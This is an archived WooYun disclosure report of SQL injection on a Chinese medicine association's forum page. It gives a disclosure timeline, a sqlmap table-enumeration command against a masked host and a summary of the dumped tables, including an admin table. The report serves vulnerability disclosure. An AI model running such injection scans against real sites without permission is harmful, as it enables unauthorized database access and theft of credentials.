WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
2015-09-02: Details sent to the vendor; awaiting the vendor's response
2015-09-05: CNCERT (National Internet Emergency Center) has not yet been able to reach the affected organization; details disclosed only to the reporting agency
2015-09-15: Details disclosed to core white hats and domain experts
2015-09-25: Details disclosed to regular white hats
2015-10-05: Details disclosed to intern white hats
2015-10-20: Details disclosed to the public
SQL injection in the China Association of Chinese Medicine website
Brute-force table enumeration
sqlmap.py -u "http://**.**.**.**/forum/query.asp?boardid=0" --tables
There were so many tables that sqlmap could not hold them all; I am asking the experts here how to handle this situation.
The sensitive name admin appears in the results; the data dumped below demonstrates that the issue exists.
[sqlmap output omitted: a long list of brute-forced table names, followed by Database: Microsoft_Access_masterdb, Table: x_admin [196 columns], every column reported with type non-numeric]
Part of the table listing could not be captured, because I don't know how to make sqlmap display all of the tables... reviewers, please bear with me.
In summary: you get the picture.
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-09-05 08:48
CNVD confirmed the described situation and has notified the organization by email through the website's public contact channel.
None yet